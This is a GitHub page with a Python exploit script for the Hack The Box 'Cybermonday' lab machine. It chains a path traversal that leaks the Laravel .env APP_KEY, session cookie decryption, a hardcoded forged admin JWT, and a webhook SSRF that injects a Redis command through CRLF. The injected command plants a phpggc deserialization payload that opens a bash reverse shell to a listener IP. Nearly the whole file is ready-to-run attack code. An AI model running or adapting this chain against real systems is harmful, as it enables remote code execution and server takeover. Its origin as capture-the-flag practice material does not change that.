-
Notifications
You must be signed in to change notification settings - Fork 0
/
HTB_Cybermonday_poc.py
135 lines (100 loc) · 3.72 KB
/
HTB_Cybermonday_poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
import os
import json
import hashlib
import sys
import hmac
import base64
import string
import random
import requests
import subprocess
from Crypto.Cipher import AES
from phpserialize import loads, dumps
if len(sys.argv) < 2:
print("Usage: python3 HTB_Cybermonday_poc.py <listener ip> <listener port>")
sys.exit(1)
username = random.randint(100, 100000)
password = random.randint(100, 100000)
def mcrypt_decrypt(value, iv):
global key
AES.key_size = [len(key)]
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
return crypt_object.decrypt(value)
def decrypt(bstring):
global key
dic = json.loads(base64.b64decode(bstring).decode())
mac = dic['mac']
value = bytes(dic['value'], 'utf-8')
iv = bytes(dic['iv'], 'utf-8')
if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
return ''
# create session
sess = requests.Session()
# login
sess.post('http://cybermonday.htb/login', data={"email": f"{username}%40cybermonday.htb", "password":password})
# Define the target URL
url = "http://cybermonday.htb/assets../.env"
# Send a GET request to the URL
response = requests.get(url)
# Check if the request was successful (status code 200)
if response.status_code == 200:
# Split the response text into lines
lines = response.text.split('\n')
# Find and extract the value of APP_KEY
app_key = None
for line in lines:
if line.startswith("APP_KEY="):
app_key = line.split(":")[1]
break
if app_key:
app_key1 = app_key
else:
print("APP_KEY not found in the response.")
else:
print(f"Failed to retrieve .env file. Status code: {response.status_code}")
# get session value
key = base64.b64decode(app_key1)
session = str(decrypt(str(sess.cookies['cybermonday_session'].replace('%3D', '=')))).split('|')[1].split('\\')[0]
# define some needed vars
# phpggc -A Laravel/RCE10 system "bash -c 'bash -i >& /dev/tcp/10.10.14.17/9999 0>&1'"
# Define the command to run
command = f"phpggc -A Laravel/RCE10 system \"bash -c 'bash -i >& /dev/tcp/{sys.argv[1]}/{sys.argv[2]} 0>&1'\""
# Run the command and capture the output
result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# Check for any errors
if result.returncode == 0:
# Command was successful
command_output = result.stdout
# Replace special characters
#replacements = {'"': '\\"', '\\': '\\\\', '\\"': '\"'}
# Replace special characters in the output
#for char, replacement in replacements.items():
# command_output = command_output.replace(char, replacement)
payload = command_output.replace('\n', '')
else:
# Command had an error
print("Command failed with error:")
print(result.stderr)
token="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE"
headers = {
"Content-Type": "application/json",
"x-access-token": token
}
# create webhook
data = {
"name": "test" + str(''.join(random.choices(string.digits, k=5))),
"description": "test",
"action": "sendRequest"
}
req = json.loads(requests.post('http://webhooks-api-beta.cybermonday.htb/webhooks/create', headers=headers, data=json.dumps(data)).text)
uuid = req['webhook_uuid']
data = {
"url": "http://redis:6379/",
"method": "SET laravel_session:" + session + " '" + payload + "'\r\n"
}
# send payload
req = requests.post('http://webhooks-api-beta.cybermonday.htb/webhooks/' + str(uuid), headers=headers, data=json.dumps(data))
print("[+] Get reverse shell")
# load session and exploit
exp=sess.get('http://cybermonday.htb/home')